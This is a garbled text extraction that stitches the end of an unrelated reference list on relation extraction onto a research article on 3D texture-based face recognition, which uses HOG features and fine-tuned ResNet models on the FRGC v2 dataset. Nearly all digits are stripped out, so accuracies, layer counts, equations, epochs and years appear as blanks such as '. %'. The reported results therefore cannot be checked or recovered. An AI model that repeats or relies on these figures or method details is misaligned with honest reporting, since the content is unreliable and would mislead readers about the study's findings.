andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r hruschka jr, and tom m mitchell. . toward an architecture for never-ending lan- guage learning. in proceedings of aaai. michael collins and yoram singer. . unsupervised models for named entity classification. in emnlp. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of emnlp. mark craven, johan kumlien, et al. . constructing biological knowledge bases by extracting information from text sources. in ismb. thomas g dietterich, richard h lathrop, and tomás lozano-pérez. . solving the multiple instance problem with axis-parallel rectangles. artificial intel- ligence. andrew gelman, john b carlin, hal s stern, and don- ald b rubin. . bayesian data analysis. crc press. raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s. weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of acl-hlt. d. koller and n. friedman. . probabilistic graphi- cal models: principles and techniques. mit press. percy liang, alexandre bouchard-côté, dan klein, and ben taskar. . an end-to-end discriminative ap- proach to machine translation. in proceedings of acl. percy liang, michael i jordan, and dan klein. . type-based mcmc. in proceedings of acl. roderick j a little and donald b rubin. . statis- tical analysis with missing data. john wiley & sons, inc., new york, ny, usa. bonan min, ralph grishman, li wan, chang wang, and david gondek. . distant supervision for rela- tion extraction with an incomplete knowledge base. in proceedings of naacl-hlt. mike mintz, steven bills, rion snow, and dan jurafsky. . distant supervision for relation extraction with- out labeled data. in proceedings of acl-ijcnlp. joakim nivre, johan hall, and jens nilsson. . memory-based dependency parsing. in proceedings of conll. sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions without labeled text. in proceedings of ecml/pkdd. sebastian riedel, limin yao, andrew mccallum, and benjamin m marlin. . relation extraction with matrix factorization and universal schemas. in pro- ceedings of naacl-hlt. alan ritter, sam clark, mausam, and oren etzioni. . named entity recognition in tweets: an experi- mental study. proceedings of emnlp. stuart j. russell, peter norvig, john f. candy, jiten- dra m. malik, and douglas d. edwards. . ar- tificial intelligence: a modern approach. benjamin snyder and regina barzilay. . database- text alignment via structured multilabel classification. in proceedings of ijcai. mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d. manning. . multi-instance multi- label learning for relation extraction. in proceedings of emnlp-conll. shingo takamatsu, issei sato, and hiroshi nakagawa. . reducing wrong labels in distant supervision for relation extraction. in proceedings acl. partha pratim talukdar and fernando pereira. . experiments in graph-based semi-supervised learning methods for class-instance acquisition. in proceedings of acl. fei wu and daniel s. weld. . autonomously se- mantifying wikipedia. in proceedings of cikm. wei xu, raphael hoffmann le zhao, and ralph grish- man. . filling knowledge base gaps for distant supervision of relation extraction. in proceedings of acl. luke s. zettlemoyer and michael collins. . online learning of relaxed ccg grammars for parsing to logical form. in emnlp-conll. 
submitted july accepted october published december corresponding author siming zheng, gs @student.upm.edu.my academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright zheng et al. distributed under creative commons cc-by . open access d texture-based face recognition system using fine-tuned deep residual networks siming zheng , rahmita wirza ok rahmat , fatimah khalid and nurul amelina nasharuddin casd, department of multimedia, putra malaysia university, sedang, malaysia c - casd, department of multimedia, putra malaysia university, sedang, malaysia c - , department of multimedia, putra malaysia university, sedang, malaysia c - , department of multimedia, putra malaysia university, sedang, malaysia abstract as the technology for d photography has developed rapidly in recent years, an enormous amount of d images has been produced, one of the directions of research for which is face recognition. improving the accuracy of a number of data is crucial in d face recognition problems. traditional machine learning methods can be used to recognize d faces, but the face recognition rate has declined rapidly with the increasing number of d images. as a result, classifying large amounts of d image data is time- consuming, expensive, and inefficient. the deep learning methods have become the focus of attention in the d face recognition research. in our experiment, the end- to-end face recognition system based on d face texture is proposed, combining the geometric invariants, histogram of oriented gradients and the fine-tuned residual neural networks. the research shows that when the performance is evaluated by the frgc-v dataset, as the fine-tuned resnet deep neural network layers are increased, the best top- accuracy is up to . % and the top- accuracy is . %. the framework proposed costs less iterations than traditional methods. the analysis suggests that a large number of d face data by the proposed recognition framework could significantly improve recognition decisions in realistic d face scenarios. subjects computer vision, graphics, multimedia keywords d textures, face recognition system, histogram of oriented gradients features, deep learning, residual neural networks, fine-tuning, tensorboard introduction with the rapid development of the internet, smart computing equipment and social networking applications are increasingly used. there are hundreds of millions of d images uploaded every day to platforms such as snapchat and alipay, on which a large number of d face images are generated. three main problems in creating d face recognition systems that many researchers report are the d face pose, illumination changes, and variations in facial expression. extracting better features are a key process for d face recognition (bagchi, bhattacharjee & nasipuri, ; zhang et al., ; nagi et al., ; wang et al., ; zhu et al., ). furthermore, shallow learning (such as machine learning) including only one or no layer of hidden units leads to lack of ability to deal with large-scale data. these challenges have caused persistent problems for the robustness and reliability of such how to cite this article zheng s, rahmat rwok, khalid f, nasharuddin na. . d texture-based face recognition system using fine- tuned deep residual networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:gs @student.upm.edu.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . 
/peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. systems, which has driven many researchers to use deep learning for d face recognition tasks. when deep learning methods are applied in realistic d face scenarios, two challenges confronted are as follows: firstly, the accuracy becomes unstable as d face images are added; this is because different deep learning networks have different generalization ability extracting images features. when processing a large number of image data, the deeper the layers of deep learning model are, the more problems such as gradient vanishing and gradient exploration will be caused. secondly, as more and more complex deep learning models will be applied to the actual scenario, the recognition rate may be affected by the depth of a complex model. in this article we explore both issues. how to recognize a large number of d face graphics with high precision is the main task of this article. in this work, the primary objective of the approaches we propose is to create a d textures-based end-to-end face recognition system with a high recognition accuracy, a satisfied performance and robustness while remaining practical. in this system, we have developed a residual neural network model base on resnet for the d face recognition task. this model is fine-tuned with different depths using hog featured d face textures. the primary aim is to solve problems of gradient vanishing and gradient exploration. we trained fine-tuned resnet models with different depths using hog based d texture images to maintain faster calculations and a high accuracy of image growth. the remainder of this work is prepared as follows. ‘related works’ reminds the related work. ‘materials & methods’ presents methodology of extraction of hog features and the fine-tuning resnet model. ‘experiment’ shows the experimentation, results and discussion is described in ‘results and discussion’. the conclusions are finally stated in ‘conclusions’. related works deep learning algorithms have received increasing attention in the face recognition field, and many researchers discovered the importance of studying d face recognition (maiti, sangwan & raheja, ; min et al., ; pabiasz, starczewski & marvuglia, ; porro-munoz et al., ; hu et al., ; sun et al., ; wu, hou & zhang, ; tang et al., ; zhang, zhang & liu, ). on one hand, extracting d face information is the key step in d face recognition: effective face detection and alignment can increase the overall performance of d face recognition, which is critical in both security and commercial d face recognition systems. on the other hand, researchers have proposed some methods for exploiting and exerting the deep learning for d face recognition, and they have demonstrated that the performance of deep learning systems is significantly better than that of machine learning method in the case of a large amount of d images. in recent years, the convolutional neural network (cnn) models have been used for d face recognition. hu et al. ( ) has proposed a method of customizing convolutional neural networks. her cnn’s layer configuration uses the same principle to design based on the lecun model (lecun et al., ). the structure of her model, called cnn- , comprises one convolutional layer, one pooling layer, and a × filter. however, this structure cannot effectively extract and analyze d face data. when the learning rate rose zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. from . to . , the classification accuracy increased from . % to . %; while, the accuracy dropped to . % when the learning rate rose to . . furthermore, using a × filter increased the classification accuracy significantly to . % with a learning rate of . . in a follow-up study, sharma & shaik ( ) have proposed a new methodology for face recognition with a higher accuracy of approximately %. they suggested a customized cnn model, including an input layer, a convolutional layer, a pooling layer, and a fully connected layer. they use the above method to recognize the d image with resolution of × . according to results, their face recognition system takes twenty epochs for converging the learning rate, which includes the training rate and the testing rate. especially, the training losses can be decreased to about before the th epoch. different methods have been proposed to recognize d face images. kim et al. ( ) has developed the vggnet neural network for dealing with d face data. the most representative features of face are extracted from the fine-tuned vggnet model. the model includes two convolution layers and two fully connected layers with random initial weights, using the last fully connected layer with a softmax layer to accommodate the different sizes of the input images. the fine-tuned vggnet model achieved an accuracy of . % in the experiment. nagi et al. ( ) has developed the face alignment algorithm based on the methods of geometric invariants, local binary pattern (lbp), and k-nearest neighbor (knn). the face landmarks model ( key points) is used to detect the human face, and the lbp method is used to crop the d face areas. the method of knn calculates the distance between each input data and the training sample, obtaining the k images closest to the training sample. finally, proposed statistical methods are used to classify and recognize the images. the results show that the model can reach . % in the recognition rate; however, it declined to % as the number of datasets increases. soltanpour & jonathan wu ( ) uses normal vector to study d face recognition. she proposed that more detailed distinct information can be extracted from the d facial image by using high-order lndp method. by estimating the three components of normal vectors in x, y and z channels, three normal component images are extracted. the score-level fusion of three high-order lndp x, lndp y and lndp z are used to improve the recognition performance. experiments use sift-based strategy for matching the face features. the results of this study indicate that fusion lndp xyz outperforms descriptors, effectively improving the d recognition rate to . %. the study by kamencay et al. ( ) offers probably the most comprehensive empirical analysis of d face recognition. in an attempt to build practical and robust face recognition systems, he proposed three main types of layers for cnn architectures: the convolution layer, the pooling layer, and the fully connected layer. he also proposed three machine learning methods for face recognition, such as principal component analysis ( . %), local binary patterns histograms ( . %), and knn ( . %). the proposed customized cnn for d face recognition outperforms the above machine learning methods, which reaches the average accuracy of approximately . %. the highest accuracy is . % when % of the data was used for training model. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
recent advances in hog feature extraction methods have facilitated investigation of face recognition. in singh & chhabra’s ( ) article, she suggests that hog features can be used in the recognition system for improving the efficiency and the processing speed. the function of hog features can capture the edge features that are invariant to the rotation and light. owing to the fact that both texture and edge information is important for face representation. hog features and svm classifier-based face recognition algorithm is presented in santosh dadi & mohan pillutla’s ( ) research. his proposed model extracts the hog features of the face from the image, these features can be given to any classifier. in the testing stage, the test image is obtained and fed to the svm classifier, which is a non-probabilistic binary classifier and looks for optimal hyperplane as a decision function, for classification. the results show that this method has better classification accuracy for the test data set, about %. in addition, compared to the method using standard eigen feature and pca algorithm as a baseline, svm also possesses an improved face recognition rate of . %. to investigate the effect of utilizing hog features in the cnn model, (ahamed, alam & manirul islam, ) developed cnn learning models that using the hog features as input data to the training model. his model contains of several layers and each layer is repeatedly used, finally a deep neural network is constructed. in order to evaluate the proposed model, a set of images with images are generated for testing the model performance. however, it leads to a low generalization ability since the data set trained by the model is small. the result shows that the accuracy is approximately % by using the constructed model. in the experiment, we used the latest residual deep neural network (resnet) and the fine-tuning method (he et al., ). our preprocessing method uses hog features of d face texture, different layers of resnet are created during the experiment and whether decision making in face recognition process can be improved or not is investigated. we evaluated these approaches in the context of the same d face-recognition experiment as in (kamencay et al., ), a more challenging task than the face identification task used in (ahamed, alam & manirul islam, ). materials & methods the diversity of face poses raises difficulties for d face recognition. by detecting key points on the face, such as the tip of the nose, the corners of the mouth, and the corners of the eyes, the face image in an arbitrary pose can be converted into a frontal face image by affine transformation, after which the face features can be extracted, and an identification is performed. this approach shows that after alignment the features can be extracted with greater success, and the recognition accuracy is thus greatly improved. a schematic diagram of face detection and face alignment is shown in fig. . there are three steps for preprocessing of d face recognition: . d face detection, . d face alignment. . d human face feature extraction. the first two phases are implemented by using the open-source tool provided by the dlib, which can monitor the key points of the face real time to obtain the position and posture of the face. then we developed a module for extracting the hog features based on d face texture images. key points of the face zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
figure the pre-processing of d face textures. full-size doi: . /peerjcs. /fig- are detected using the conditional local neural fields algorithm (baltrusaitis, robinson & morency, ; simonyan & zisserman, ). facial detection and landmarks selection all d images need to be processed before the processing of recognition in order to reduce image noise and redundancy, as shown in fig. . the first step of d face recognition is face detection and alignment. we use pre-trained facial landmark detector from the dlib library, which is used to estimate and predict the location of sixty-eight key points on the human face. based on the geometric invariant method, these facial points are marked on the d facial images (baltrusaitis, robinson & morency, ; jourabloo & liu ; song et al., ), the subgraphs of a and c is the original d images, and the key point distributions are indicated as b and d in fig. on the right side. these points, including the dominant facial features, such as the tip of the nose, the corners of the mouth, and the corners of the eyes, which are used for further feature extraction and geometric calculations in the recognition stage. the features of histogram of oriented gradient in the feature extraction process, we usually try to find the invariant properties and characteristics so that the extraction results do not change significantly due to the specified conditions, this means that the goal of recognition is to find useful discriminative information not the position and size. regardless of the different changes in the shape and zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure facial landmarks ( key points) of face recognition grand challenge version (frgc v . ). the subgraphs of a and c show that the camera takes images of the subjects from different angles. note that face coordinates are located by using green key points in the subgraphs of b and d. full-size doi: . /peerjcs. /fig- appearance of the image, we should find reliable and robust discriminative information for improve the recognition rate. in the field of image processing and computer vision, texture analysis and extraction have a rich history. a method called the histogram of oriented gradient (hog) has received extensive attention. the core idea of the hog method is to describe the texture of the detected object by the gradient or distribution of edge directions. its function is to capture the edge or gradient structure from the image, which is characteristic for the representation of local texture. the benefit of this feature is relatively less affected by the appearance and shape. essentially, it forms a template and uses learning models to effectively promote recognition. the hog descriptor can extract important features from d images (santosh dadi & mohan pillutla, ; kumar, happy & routray, ). it captures the local texture information well and has good invariance to geometric and optical changes. firstly, the target image is divided into small connected regions, which call the cell units. then, the gradient or edge direction of each pixel in the cell unit are acquired. finally, the histograms can be combined to form a feature descriptor. in this section, the hog feature is used as a means of feature extraction in the process of recognition, the purpose is to combine the discriminative d face feature in the recognition phase, the specific implementation steps are as follows. 
( ) color and gamma normalization to reduce the influence of lighting factors, the entire image needs to be normalized in the first step. a compressing process that can effectively reduce shadows, colors and illumination variations of the image, because this information did greatly increase code complexity and demanded the higher performance of processor. at the same time, the zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. gray image is normalized by gamma formula. by smoothing part of noises, the influence of local strong light on gradient calculation is reduced. the γ is the symbol of gamma and its value is . the formula of gamma compression eq. ( ) is shown below. i(x,y)= i(x,y)γ ( ) ( ) gradient computation the gradient value of each pixel position is calculated in this step. the derivation operation can capture contours, human shadows, and some texture information, which further weakens the influence of illumination. in the operation of computing image gradient, the gradient direction is key to hog algorithm. the function of h is used for calculating of histogram of oriented gradient. each pixel point of the transverse gradient gx(x,y) and the longitudinal gradient of the gy ( x,y ) is calculated. it defined as eqs. ( ) and ( ). gx(x,y)=h(x+ ,y)−h(x− ,y) ( ) gy(x,y)=h(x,y+ )−h(x,y− ) ( ) ( ) creating the orientation histograms the algorithm needs to finish some operations that calculating the direction gradient of the smallest interval. at the beginning, the d image is divided into several intervals with different sizes. starting from the smallest interval, the gradient direction of all the pixels are contained in each interval, which are weighted by the magnitude. the gradient direction with the largest value represents the gradient direction in the current interval. finally, the gradient magnitude g ( x,y ) of each pixel point is calculated according to eq. ( ). g(x,y)=[gx(x,y) +gy(x,y) ] / ( ) furthermore, the specific operation in the equation above is that the g(x,y)ranges from − ◦ to ◦ . vectors can be evenly divided into nine intervals because each interval is ◦ . this means that nine intervals consist of a total of nine feature vectors in a cell. four cells can form a block, so each block includes feature vectors. in this way, the feature vectors of all cells in a block are concatenated to form the hog features. ( ) computing the directional gradient histogram in the final step of the merging process, the algorithm uses weighted voting to combine the order of all blocks from smallest to largest. in some cases, the algorithm eliminates some detailed features, which are represented by the small amplitude gradient in the intervals. the rest of the blocks are merged into a maximum gradient pattern, in which contains the important representative features in the d images. gradient direction a(x,y) of the pixel point are calculated according to eq. ( ). α(x,y)= tan(− )[gy(x,y)/gx(x,y)] ( ) ( ) creating the orientation histograms after completing above works, the algorithm generated an orientation histogram for the input d face image. in this experiment, we make the pixel of × constitute a zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the processing of hog feature extraction. (a) original d face image (b) input d face im- age; (c) hog feature extraction. full-size doi: . /peerjcs. 
/fig- block in an image with × image, the stride of scanning window is × , then there are scanning windows in the horizontal and vertical directions in a d texture image. therefore, each d texture image ( × × ) has , dimensional vectors that can form a complete edge orientation histogram. after the preprocessing, the face image with extracted hog features of d textures is input into our fine-tuned resnet classification model. the information contained in the original image is compressed and adjusted, which greatly improves the performance of the subsequent feature extraction network in resnet neural network. finally, the whole processing of hog feature extraction for d face image is shown in figs. a, b and c. we also demonstrate generation of hog feature vectors for specific person with different expression, scenarios and various illumination changes. the images based on hog features extraction are shown from the figs. f to j, which are separately correspond to the reprocessing aligned images from figs. a– e. the architecture of resnet neural networks convolutional neural networks with multiple layers have several advantages in the research of image classification. the deep network uses a form of end-to-end neural network that automatically integrates the low, medium, and high-level features, and then transmits all of these features to the classifier, extracting different depth features by stacking layers with different depths. another benefit of the cnn network is that the convolutional layer can zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the hog features of various d face images. the subject images (a, b, c, d, and e) were taken under the different conditions of illuminations, expressions, sexes, and ages. depending on the pa- rameters in the hog calculation process, the experimental results ensure that the acquired images (f, g, h, i, and j) reveal the discriminative information related to the texture of the original face images. full-size doi: . /peerjcs. /fig- retain local spatial patterns which may be appropriate for image related tasks (zeiler & fergus, ). recent research has shown that the depth of the cnn network is critical to model performance (szegedy et al., ; cheng et al., ). the results of their studies show that the deep convolutional neural network achieves superior performance and significant improvements. in general, the deeper the neural network is, the worse the recognition performance will be. one major issue in early d face recognition research is caused by the use of an error back-propagation algorithm (lawrence & lee giles, ), which includes the weight coefficient, the derivative of the activation function, and the activation value in the partial derivative. when the number of layers is large, these values are multiplied, easily leading to the vanishing gradient and exploding gradient problems (pascanu, mikolov & bengio, ; hanin, ). therefore, it is difficult to ensure high-accuracy in the case of growth of d face data. in the paper by he et al. ( ), he proposed a theory of deep residual learning, which adopted an approach of shortcut connection to avoid the issues mentioned above. the resnet architecture for a -layer network (a) and a residual block (b) are shown in fig. above. a residual block with a connections layer can skip a specific layer in the network. 
the advantages of short connections are that it can reduce the problem of gradient disappearance, thus making the network converge faster and reducing parameters. resnet- also uses the batch normalization operation between each convolution and activation. it allows the researcher to build increasingly deep networks, which have high recognition abilities. the fine-tuned resnet neural network model in deep neural networks, the function of the first layer of training on images is similar to the gabor filters and color spots operations. first-layer features are not used for specific zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the architecture of resnet model. full-size doi: . /peerjcs. /fig- data sets or specific tasks but for general ones, because they are applicable to common data sets and tasks. image features are eventually transmitted from general to specific by the last layer of the network (yosinski et al., ). in the big data scenario, we introduce the fine-tuning method in the resnet neural network, which can greatly shorten the training time, efficiently improve the training loss, and have a stronger generalization ability for getting a good result. ( ) fine-tuning method the fine-tuning method can be used to flexibly adjust the architecture of the resnet model in this d face recognition task (jung et al., ). in our experiment, four pooling layers with the adaptive average pooling method have been reconstructed. by using the new architecture, it makes the input training data adaptive to the fine-tuned resnet model, and the computational complexity of the model is reduced. a softmax layer is created after the fully connected layer to implement the target data classification task of this experiment. ( ) rectifier linear unit the rectifier linear unit (relu) is an important activation function in the resnet structure, which can overcome the problem of gradient disappearance and speed up the time of training (fred & agarap, ). a relu function maps the input value x to if it is negative, and keeps its value unchanged if it is positive, the main relu calculation zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the fine-tuned resnet neural network. full-size doi: . /peerjcs. /fig- expression (eq. ( )) is shown below. frelu(x)=max( ,x) ( ) the convolutional neural network architecture is mainly followed with a combination of all the methods described above. the architecture starts from the input layer of training images and is followed by the convolution layer with the optimum weight and bias for the feature layer. in order to reduce the internal covariate shift (ioffe & szegedy, ) in the deep neural network, the batch normalization algorithm is also added to each convolutional layer to perform the operations of normal normalization and affine transformation on the input of each layer. finally, our fine-tuned resnet model were constructed with the proposed method, and the parameters of each convolutional layer are represented in fig. . 
in this fine-tuned resnet model, the layer of adaptive average pooling emphasizes the down-sampling of the overall feature information, its purpose is to reduce the dimension of the feature and retain the effective information, it can integrate features in the feature maps from multiple convolutional layers and pooling layers so that the integrity of the information in this dimension can be more reflected. through this process, both high- dimensional features and confidence scores can be obtained from each classification. the final full connection layer is used to synthesize the features extracted from the adaptive zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. average pooling, it can output the probability distribution by using the softmax regression method, which can be divided into more than , classifications for any tasks, and the value of this parameter was set to in our experiment. in the above structure, adam function is used as an alternative to the traditional stochastic gradient descent (sgd) optimization algorithm which can iteratively update the weights based on the training data mainly to optimize the neural network and make the training faster. datasets this research received the approval from the university of notre dame (henceforth, und), and the dataset of face recognition grand challenge version (frgc-v ) in january . this experiment was performed on frgc-v (flynn, ), which is a large number standard face image dataset containing over , high-resolution d and d face images, which divided into training and validation partitions in a laboratory setting. training partition is designed for training algorithms, and validation partitions is used to evaluate the performance of a method in a laboratory environment. all the images were captured by a minolta vivid / series scanner. the datasets used belong to experiment of frgc-v . the experimental d face dataset includes , images of people with different lighting and facial expressions the aim of this dataset is to test the ability to run experiments on large datasets (phillips et al., ). graphics processing unit the efficient parallel computing of the graphics processing unit (gpu) makes up for the slow training of deep neural networks (chen et al., ). combined with the cuda parallel computing platform, it allows the use of larger training datasets and deeper complex neural networks to extract deeper image features (huang et al., ; singh, paul & dr. arun, ). the model of gpu used in this experiment is nvidia geforce gtx ti. its multi-core architecture includes thousands of stream processors, which can perform vector operations in parallel and achieve several times greater throughput in the application. this significantly shortens the calculation time. gpu has therefore been widely used by scientists in deep network learning. the fig. shows the processing of our proposed framework. the detailed steps of the proposed framework are as follows: first, the image is detected by the key points of facial landmarks method, and the main multi-channel d face regions are extracted, this preprocessing module achieved precision rate of . % and effectively reduces image noise and redundancy from original images, and all images are rescaled to the × × . 
then, the edges and textures of d face images are enhanced by using the hog method with custom parameters, the hog face feature images based on d textures are obtained, which learned higher discriminative features from d face images. next, fine-tuned deep residual model is proposed by using the hog textures as the input images. finally, we generated custom resnet neural network model. its image input size is adjusted to the pixel of × × , and the structure and quantity of the middle layer in the model are reconstructed, all the operations are performed by using fine-tuning method. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the fine-tuned resnet feature extraction operation. full-size doi: . /peerjcs. /fig- experiment key point detection and alignment were carried out on the d raw face texture in succession. in the following steps, the dataset applied to the fine-tuned resnet model comprises d face texture with hog features. finally, the proposed model conducted for d face recognition. in this experiment, an implementation of gpu accelerated training is adopted based on python and the cuda architecture, all the hog-featured images were resized of × × pixel in the dataset, the test model of fine-tuned resnet with different depth layers (e.g., layers, layers, layers) were then evaluated. ( ) firstly, a convolution layer in fine-tuned resnet architecture multiplies the × filter with a highlighted area (also × ) of the input feature map, and all the values are summed up to generate one value in the output feature map, as shown in fig. . ( ) after the d data are processed through the first convolution layer, the next layer is max-pooling. the filter window of the max-pooling is moved across the input feature with a step size defined by the stride (the value of stride is in the case of resnet- ). the advantage is that it can reduce errors and preserve more texture information. in the max-pooling, the maximal value is selected from four values in the filter window. the size of the detection region is f × f, with a stride of s, so the output features h’ and w’ are given through the eq. ( ) below. h′=[ h−f +s s ],w′=[ w−f +s s ]. ( ) ( ) the residual block consists of two convolution layers each a × filter and one convolution with a × filter. the × layer mainly reduces and restores dimensions, leaving the × layer a bottleneck with smaller input/output dimensions. two × convolutions effectively reduce the number of convolution parameters and the amount of calculation. the residual block is used for resnet- / / . ( ) the fine-tuned resnet model uses a global average pool and then categorizes d face images at the end of the network through fully connected layers. the global average pooling layer provides faster calculations with more accurate classification and fewer parameters. it serves to sum up all the values from the filter window and then average them, which can reduce errors and retain d background information of the image. zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ( ) finally, the fully connected layer reassembles the previous local d features into a complete graph through the weight matrix. 
the classification y is defined as follows: y = f (w t x+b) ( ) ( ) however, having a good neural network model in specified dataset does not necessarily imply that the model is perfect or that it will be reproduced when tested on external data. in order to make sure it is robust, reproducible and unbiased for testing future new datasets under non-ideal conditions, accuracy metrics is adopted to evaluate the fine-tuned resnet model’s performance. the indicator accuracy is a measurement of the correct proportion of image classifications. this study is accurate in its ability to differentiate the d face recognition cases correctly. to estimate the accuracy of tests, the proportion of true positives (tp) and true negatives (tn) in all evaluated cases are calculated in this experiment. mathematically, this can be stated as following. accuracy = tp+tn tp+tn +fp+fn ( ) the sub formula of tp+tn+fp+fn is the total number of observations. moreover, the respective tests of top and top accuracy are used to evaluate the performance of our proposed model. the following hypothesis will be tested: the increasing network depth improves the accuracy of d face recognition. this study contributes to this developing area of research by exploring how different depth of our fine-tuned resnet networks affect the outcome of d recognition. results and discussion tensor board is a data visualization tool that can be used to visualize computational graph structure, provide statistical analysis, and plot the values captured as summaries during the execution of computational graphs. in this research, different types of pre-trained resnet neural network with the same structure but different depths are proposed. as shown in fig. , the three-subgraph shown below are the tensor board graph of linear regression corresponding to the (a), (b), and (c) layers of structure of the resnet neural networks. the d face recognition rates of the three different structural models were recorded objectively in real time use of tensor board. there were times of training and testing in all test cases. according to the results of the resnet testing model, the maximal accuracy was . % for the validation set in the th epoch, which corresponds to the similar accuracy of . % in the th epoch of the resnet model. this accuracy rate is close to . % in the same epoch in the resnet model. the highest accuracies were . % for resnet and . % for resnet . the most accurate indicator of top can be used to further evaluate the performance of the trained resnet model. in the resnet model, the recognition rate fluctuates at first and then becomes regular with the increase of test sets. the accuracy rate was maintained at an average of . % for resnet after the th epoch. the results show that the zheng et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the accuracy rate of different layer numbers in the fine-tuning resnet architecture. the per- formances are shown for the fine-tuned resnet- layer (a), the fine-tuned resnet- model (b), and the fine-tuned resnet- model (c). full-size doi: . /peerjcs. /fig- resnet model has strong generalization ability. the recognition rate reaches its peak of . % in resnet- in the th epoch of the d face recognition experiment. this experiment explores the benefits and effect of different numbers of neural network layer through the fine-tuning method on d face texture recognition research with high accuracy. the fig. 
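the overall accuracy and the top- and top- rates used below can be computed from the classifier scores as in the following pytorch-style sketch (tensor and function names are illustrative):

```python
import torch

def topk_accuracy(logits, labels, ks=(1, 5)):
    """fraction of samples whose true label is among the k highest-scoring
    classes, for each k in ks; top-1 reduces to the ordinary accuracy above."""
    max_k = max(ks)
    _, pred = logits.topk(max_k, dim=1)            # (batch, max_k) class indices
    correct = pred.eq(labels.view(-1, 1))          # broadcast comparison against true labels
    return {k: correct[:, :k].any(dim=1).float().mean().item() for k in ks}
```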
results and discussion

tensorboard is a data visualization tool that can be used to visualize the computational graph structure, provide statistical analysis, and plot the values captured as summaries during the execution of computational graphs. in this research, pre-trained resnet neural networks with the same structure but different depths are compared. as shown in fig. , the three subgraphs are the tensorboard curves corresponding to the (a), (b), and (c) layer structures of the resnet neural networks. the d face recognition rates of the three structural models were recorded objectively in real time with tensorboard. there were times of training and testing in all test cases.

according to the results of the resnet testing model, the maximal accuracy was . % for the validation set in the th epoch, which corresponds to a similar accuracy of . % in the th epoch of the resnet model. this accuracy rate is close to . % in the same epoch of the resnet model. the highest accuracies were . % for resnet and . % for resnet . the top accuracy indicator can be used to further evaluate the performance of the trained resnet model. in the resnet model, the recognition rate fluctuates at first and then becomes regular as the test set grows. the accuracy rate was maintained at an average of . % for resnet after the th epoch. the results show that the resnet model has strong generalization ability. the recognition rate reaches its peak of . % for resnet- in the th epoch of the d face recognition experiment. this experiment explores the benefits and effects of different numbers of neural network layers, via the fine-tuning method, on d face texture recognition with high accuracy.

figure . the accuracy rate for different layer numbers in the fine-tuned resnet architecture, shown for the fine-tuned resnet- (a), resnet- (b), and resnet- (c) models.

as fig. shows, as the number of layers of the fine-tuned resnet model increases, the proposed framework improves accuracy through the hog method based on d face textures. to eliminate the effects of interference factors, the d face dataset was preprocessed beforehand ( d face detection, alignment, and hog feature extraction). the experiments show the importance of a fine-tuned convolutional neural network model (resnet) with deep layers, which learns more highly discriminative features. the model is advantageous in that, although the depth is significantly increased, the resnet model is less complex and reaches a higher accuracy rate. fig. presents the inter-correlations among the three recognition rates of the resnet models with different numbers of layers. the d face recognition rate is positively correlated with the number of layers in the resnet model, which is also a principal factor determining the computing time. the experiments show that the proposed method achieves promising results, demonstrating that the resnet- neural network model described in this paper reaches a recognition accuracy of . % (top ); compared with the second most accurate test (at . %), the accuracy was improved by . % on the frgc-v datasets. these practical results prove the validity of the proposed method for d face recognition. the classification performance of the methods applied to the frgc-v dataset appears superior to the results of published studies using different methods, as summarized in table (hu et al., ; sharma & shaik, ; soltanpour & jonathan wu, ).

table . performance comparison between the proposed method and state-of-the-art methods on the frgc-v dataset (method: features, classifier, accuracy):
- huiying hu et al.: raw image, custom cnn, . %
- s. sharma et al.: constrained local model, custom cnn, %
- sima soltanpour et al.: lndp xyz-based normal component images, sift-based matching method, . %
- proposed methodology: hog features, fine-tuned resnet with layers, layers and layers, top : . %, top : . %, top : . %, top : . %, top : . %, top : . %

